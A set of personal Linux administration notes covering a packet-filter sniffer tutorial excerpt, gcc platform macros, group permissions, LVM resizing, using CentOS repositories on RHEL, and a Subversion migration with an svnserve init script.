First, you will need to install the tcpdump program from LBL (see Resources). But, if you are reading this article, it is likely that you already know and use tcpdump. The first versions were written by the same people who wrote the BPF paper and its first implementation. In fact, tcpdump uses BPF, in the form of a library called libpcap, to capture and filter packets. The library is an OS-independent wrapper for the BPF engine. When used on Linux machines, BPF functions are carried out by the Linux packet filter.

One of the most useful functions provided by libpcap is pcap_compile(), which takes a string containing a logic expression as input and outputs the BPF filter code. tcpdump uses this function to translate the command-line expression passed by the user into a working BPF filter. What is interesting for our purposes is that tcpdump has a seldom-used switch, -d, which prints the code of the filter.

For example, typing tcpdump host 192.168.9.10 will start sniffing and grab only those packets whose source or destination IP address matches 192.168.9.10. Typing tcpdump -d host 192.168.9.10 will print the BPF code that recognizes the filter, as shown in Listing 3.

Listing 3. Tcpdump -d Results

Let's briefly comment on this code; lines 0-1 and 6-7 verify that the captured frame is actually transporting IP, ARP or RARP protocols by comparing their protocol IDs (see /usr/include/linux/if_ether.h) with the value found at offset 12 in the frame (see Figure 1). If the test fails, the packet is discarded (line 13).

Lines 2-5 and 8-11 compare the source and destination IP addresses with 192.168.9.10. Note that, depending on the protocol, the offsets of these addresses are different; if the protocol is IP, they are 26 and 30, otherwise they are 28 and 38. If one of the addresses matches, the packet is accepted by the filter, and the first 68 bytes are passed to the application (line 12).

The filter code is not always optimized, since it is generated for a generic BPF machine and not tailored to the specific architecture that runs the filter engine. In the particular case of the LPF, the filter is run by the PF_PACKET processing routines, which may have already checked the Ethernet protocol. This depends on the protocol field you specified in the initial socket() call: if it is not ETH_P_ALL (which means that every Ethernet frame shall be captured), then only frames having the specified Ethernet protocol will arrive at the filter. For example, in the case of an ETH_P_IP socket, we could rewrite a faster and more compact filter as follows:

(000) ld  [26]
(001) jeq #0xc0a8090a  jt 4  jf 2
(002) ld  [30]
(003) jeq #0xc0a8090a  jt 4  jf 5
(004) ret #68
(005) ret #0

Installing the Filter

Installing an LPF is a straightforward operation: all you have to do is build the filter as an array of sock_filter instructions, wrap it in a sock_fprog structure, and attach it to an open socket.

The filter structure is easily obtained by replacing tcpdump's -d switch with -dd. The filter will then be printed as a C array that you can copy and paste into your code, as shown in Listing 4. Afterward, you attach the filter to the socket by simply issuing a setsockopt() call.


Listing 4. Tcpdump with -dd Switch

A Complete Example

We will conclude this article with a complete example (see Listing 5 at ftp://ftp.ssc.com/pub/lj/listings/issue86/). It is exactly like the first two examples, with the addition of the LSF code and the setsockopt() call. The filter has been configured to select only UDP packets, having either source or destination IP address 192.168.9.10 and source UDP port equal to 5000.

In order to test this listing, you will need a simple way to generate arbitrary UDP packets (such as sendip or apsend, found on http://freshmeat.net/). Also, you may want to adapt the IP address to match the ones used in your own LAN. To accomplish this, just substitute 0xc0a8090a in the filter code with the IP address of your choice in hex notation.

A final remark concerns the status of the Ethernet card when you exit the program. Since we did not reset the Ethernet flags, the card will remain in promiscuous mode. To solve this problem, all you need to do is install a Control-C (SIGINT) signal handler that resets the Ethernet flags to their previous value (which you will have saved just before ORing with IFF_PROMISC) before exiting the program.

Conclusions

Sniffing packets over your LAN is an invaluable tool for debugging network problems or collecting measurements. Sometimes the commonly available tools, such as tcpdump or ethereal, will not exactly fit your needs and writing your own sniffer can be of great help. Thanks to the LPF, you can do this in a simple and efficient way.


Coding for cross-platform deployment with gcc/g++: (Linux C++)

http://www.yolinux.com/TUTORIALS/LinuxTutorialC++.html

The gcc/g++ compiler predefines a number of preprocessor macros. The list of macros defined by gcc/g++ can be viewed by issuing the command: g++ -dM -E -x c++ /dev/null (the compiler's spec strings, by contrast, are dumped with g++ -dumpspecs)

The defined preprocessor variables can then be used to handle platform dependencies.

Platform                  Defined macros
------------------------  --------------------------------------------------
RHEL/Fedora Linux (GCC)   unix, posix, _POSIX_SOURCE, linux, __gnu_linux__,
                          __i386__ (32-bit) / __x86_64__ (64-bit)
Red Hat 8 Linux           linux, __gnu_linux__
Suse 9.2 Linux            linux, __gnu_linux__
Sun Solaris/SPARC         sparc, __arch64
SGI IRIX/MIPS             sgi, _SGI_SOURCE, mips, host_mips
Cygwin Win/Intel-32       __CYGWIN32, WIN32, _X86_

Example C/C++ source code 1:

#ifdef sparc
    ...
#endif

#ifdef linux
    ...
#endif

#ifdef __CYGWIN32
    ...
#endif

#if defined(linux) || defined(sparc)
    ...
#endif

Example C/C++ source code 2:

#ifdef sgi
    return fn_sgi();
#elif defined(__CYGWIN32)
    return fn_win();
#elif defined(linux)
    return fn_linux();
#else
    struct time ts;
    return fn_time();
#endif

OR

#ifdef sgi
#include "file_sgi.h"
#elif defined(sparc)
#include "file_sparc.h"
#elif defined(linux)
#include "file_linux.h"
#else
#error Unknown OS type
#endif

Note the use of the "#error" directive to abort compilation on an unknown platform.


Giving a user access to another user's home directory (Linux)

Create a group:

# groupadd developers

Add the user to the group:

Add existing user tony to the developers supplementary/secondary group with the usermod command, using the -a option, i.e. append the user to the supplemental group(s). Use only together with the -G option:

# usermod -a -G developers tony

Change existing user tony's primary group to developers:

# usermod -g developers tony

Ensure that the user was added properly to group developers:

# id tony

Output:

uid=1122(tony) gid=1125(tony) groups=1125(tony),1124(developers)

You could also create a group (example: developers), add the new user to it, then run:

chgrp developers <user's home directory>

and give the new group full access with:

chmod 775 <user's home directory>


Resizing LVMs (Linux)

LVM is a disk allocation technique that supplements or replaces traditional partitions. In an LVM configuration, one or more partitions, or occasionally entire disks, are assigned as physical volumes in a volume group, which in turn is broken down into logical volumes. File systems are then created on logical volumes, which are treated much like partitions in a conventional configuration. This approach to disk allocation adds complexity, but the benefit is flexibility. An LVM configuration makes it possible to combine disk space from several small disks into one big logical volume. More important for the topic of partition resizing, logical volumes can be created, deleted, and resized much like files on a file system; you needn't be concerned with partition start points, only with their absolute size.

Note: I don't attempt to describe how to set up an LVM in this article. If you don't already use an LVM configuration, you can convert your system to use one, but you should consult other documentation, such as the Linux LVM HOWTO (see Resources), to learn how to do so.

Resizing physical volumes

If you've resized non-LVM partitions, as described in Part 1 of this series, and want to add the space to your LVM configuration, you have two choices:

You can create a new partition in the empty space and add the new partition to your LVM.

You can resize an existing LVM partition, if it's contiguous with the new space.

Unfortunately, the GParted (also known as Gnome Partition Editor) tool described in Part 1 of this series does not support resizing LVM partitions. Therefore, the easiest way to add space to your volume group is to create a new partition in the free space and add it as a new physical volume to your existing volume group.

Although GParted can't directly create an LVM partition, you can do so with one of the following tools:

parted (text-mode GNU Parted)

fdisk for Master Boot Record (MBR) disks

gdisk for globally unique identifier (GUID) Partition Table (GPT) disks

If you use parted, you can use the set command to turn on the lvm flag, as in set 1 lvm on to flag partition 1 as an LVM partition. Using fdisk, you should use the t command to set the partition's type code to 8e. You do the same with gdisk, except that its type code for LVM partitions is 8e00.

In any of these cases, you must use the pvcreate command to set up the basic LVM data structures on the partition and then vgextend to add the partition to the volume group. For instance, to add /dev/sda1 to the existing MyGroup volume group, you type the following commands:

pvcreate /dev/sda1

vgextend MyGroup /dev/sda1

With these changes finished, you should be able to extend the logical volumes in your volume group, as described shortly.

Resizing logical volumes

For file systems, resizing logical volumes can be simpler than resizing partitions because LVM obviates the need to set aside contiguous sets of numbered sectors in the form of partitions. Resizing the logical volume itself is accomplished by means of the lvresize command. This command takes a number of options (consult its man page for details), but the most important is -L, which takes a new size or a change in size, a change being denoted by a leading plus (+) or minus (-) sign. You must also offer a path to the logical volume. For instance, suppose you want to add 5 gibibytes (GiB) to the size of the usr logical volume in the MyGroup group. You could do so as follows:


lvresize -L +5G /dev/mapper/MyGroup-usr

This command adjusts the size of the specified logical volume. Keep in mind, however, that this change is much like a change to a partition alone. That is, the size of the file system contained in the logical volume is not altered. To adjust the file system, you must use a file system-specific tool, such as resize2fs, resize_reiserfs, xfs_growfs, or the resize mount option when mounting Journaled File System (JFS). When used without size options, these tools all resize the file system to fill the new logical volume size, which is convenient when growing a logical volume.

If you want to shrink a logical volume, the task is a bit more complex. You must first resize the file system (using resize2fs or similar tools) and then shrink the logical volume to match the new size. Because of the potential for a damaging error should you accidentally set the logical volume size too small, I recommend first shrinking the file system to something significantly smaller than your target size, then resizing the logical volume to the correct new size, and then resizing the file system again to increase its size, relying on the auto-sizing feature to have the file system exactly fill the new logical volume size.

Remember also that, although you can shrink most Linux-native file systems, you can't shrink XFS or JFS. If you need to shrink a logical volume containing one of these file systems, you may have to create a new smaller logical volume, copy the first one's contents to the new volume, juggle your mount points, and then delete the original. If you lack sufficient free space to do this, you may be forced to use a backup as an intermediate step.

Procedure performed using the Parted Magic distro:

Created an ext2 partition /dev/sda2 in the unallocated space

pvcreate /dev/sda2

vgextend VolGroup00 /dev/sda2

vgdisplay and lvdisplay to check that everything is in order.

e2fsck -f /dev/VolGroup00/LogVol00

resize2fs /dev/VolGroup00/LogVol00

to resize the whole thing (try a mount to verify everything is OK).


Installing the CentOS 5 repo on Red Hat 5

Set the proxy:

export http_proxy=http://10.140.4.220:81
export ftp_proxy=http://10.140.4.220:81

Get the GPG key:

wget http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5

Import it:

rpm --import RPM-GPG-KEY-CentOS-5

Copy it to:

/etc/pki/rpm-gpg

Create:

/etc/yum.repos.d/centos5.repo

Containing:

[centos5]
name=CentOS-$releasever - Base
baseurl=http://mirror.centos.org/centos/5/os/$basearch
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-5
#gpgkey=http://ATrpms.net/RPM-GPG-KEY.atrpms
gpgcheck=1

Done.

Using the CentOS repository in RHEL [better] (Linux)

Enable the proxy:

Better answer - use /etc/profile.d/proxy.[csh,sh]

Create the following files in /etc/profile.d; this will then work in *any* shell for *any* user of the system:

#proxy.sh
export http_proxy=http://host.com:port/
export ftp_proxy=http://host.com:port/
export no_proxy=.domain.com
export HTTP_PROXY=http://host.com:port/
export FTP_PROXY=http://host.com:port/

#proxy.csh
setenv http_proxy http://host.com:port/
setenv ftp_proxy http://host.com:port/
setenv no_proxy .domain.com
setenv HTTP_PROXY http://host.com:port/
setenv FTP_PROXY http://host.com:port/

(10.140.4.220:81)

Download the public key from http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5

(wget http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5)

rpm --import RPM-GPG-KEY-CentOS-5


(or: rpm --import --httpproxy $httpproxy --httpport $httpport http://mirror.centos.org/centos/RPM-GPG-KEY-CentOS-5)

Create a centos.repo file in /etc/yum.repos.d/ (if you use the vault, all CentOS versions are available):

[base]
name=Red Hat Linux - Base
baseurl=http://vault.centos.org/5.3/os/i386
enabled=1
gpgcheck=1
gpgkey=file:///etc/yum/RPM-GPG-KEY-CentOS-5
priority=1

I don't know whether this step is required, but some sites recommend it (I did it):

http://jyrxs.blogspot.it/2008/02/using-centos-5-repos-in-rhel5-server.html

Tuesday, February 19, 2008

Using CentOS 5 Repos in RHEL 5 Server

1. Remove the "yum-rhn-plugin" package from RHEL; it is used to check the activation status in RHEL.

# rpm -e yum-rhn-plugin

2. Remove the "redhat-release" related packages; they are used to check repository compatibility. Usually we can't remove these packages because other packages of the system depend on them for proper functioning, so we'll use the "--nodeps" parameter to forcibly remove them from the system.

# rpm -e redhat-release-notes-5Server redhat-release-5Server --nodeps

3. Download and install the "centos-release" related packages, to fill the gap left by removing the "redhat-release" related packages.

i386 (32 bit)

http://mirrors.nl.kernel.org/centos/5/os/i386/CentOS/centos-release-5-2.el5.centos.i386.rpm

http://mirrors.nl.kernel.org/centos/5/os/i386/CentOS/centos-release-notes-5.2-2.i386.rpm

x86_64 (64 bit)

http://mirrors.nl.kernel.org/centos/5/os/x86_64/CentOS/centos-release-5-2.el5.centos.x86_64.rpm

http://mirrors.nl.kernel.org/centos/5/os/x86_64/CentOS/centos-release-notes-5.2-2.x86_64.rpm

4. To be automatically notified about updates in the GUI, do the following.

# nano /etc/yum/yum-updatesd.conf

In the file, type as follows under the section "# how to send notifications"

dbus_listener = yes

5. To change the OS name in the CLI login, do the following.

# nano /etc/issue

Since we have installed the "centos-release" related packages, the OS name will come up as "CentOS release 5 (Final)", so delete it and type

Red Hat Enterprise Linux Server release 5 (Tikanga)

Or any name you like.

6. Now your system is ready.


ALSO ADD

ELREPO.ORG (mhvtl)

rpm --import --httpproxy $httpproxy --httpport $httpport http://elrepo.org/RPM-GPG-KEY-elrepo.org

rpm -Uvh --httpproxy $httpproxy --httpport $httpport http://elrepo.org/elrepo-release-5-4.el5.elrepo.noarch.rpm

DAG WIEERS

rpm -Uhv --httpproxy $httpproxy --httpport 81 http://apt.sw.be/redhat/el5/en/i386/rpmforge/RPMS/rpmforge-release-0.3.6-1.el5.rf.i386.rpm

CVS-to-SVN migration (cvs2svn)

svnadmin create /home/svn/drams_analysis

cvs2svn --existing-svnrepos --encoding=latin_1 -s /home/svn/drams_analysis /home/cvs/cvsroot/DRAMS_Analysis/

(kill any running svnserve first)
svnserve -d --listen-host 10.180.100.87 -r /home/svn
vi /etc/rsnapshot.conf (added the backup)

svnserve startup script (redhat)

/etc/init.d/svnserve

#!/bin/bash
#
# /etc/rc.d/init.d/subversion
#
# Starts the Subversion Daemon
#
# chkconfig: 2345 90 10
# description: Subversion Daemon

# processname: svnserve

. /etc/rc.d/init.d/functions

[ -x /usr/bin/svnserve ] || exit 1

### Default variables
. /etc/sysconfig/subversion

RETVAL=0
prog="svnserve"


desc="Subversion Daemon"

start() {
        echo -n $"Starting $desc ($prog): "
        daemon $prog -d $OPTIONS
        RETVAL=$?
        [ $RETVAL -eq 0 ] && touch /var/lock/subsys/$prog
        echo
}

stop() {
        echo -n $"Shutting down $desc ($prog): "
        killproc $prog
        RETVAL=$?
        [ $RETVAL -eq 0 ] && success || failure
        echo
        [ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/$prog
        return $RETVAL
}

case "$1" in
  start)
        start
        ;;
  stop)
        stop
        ;;
  restart)
        stop
        start
        RETVAL=$?
        ;;
  condrestart)
        [ -e /var/lock/subsys/$prog ] && { stop; start; }
        RETVAL=$?
        ;;
  *)
        echo $"Usage: $0 {start|stop|restart|condrestart}"
        RETVAL=1
esac

exit $RETVAL

/etc/sysconfig/subversion

# Configuration file for the Subversion service
#
# To pass additional options (for instance, -r <root of directory to serve>)
# to the svnserve binary at startup, set OPTIONS here.
#
#OPTIONS=
OPTIONS="-r /home/svn"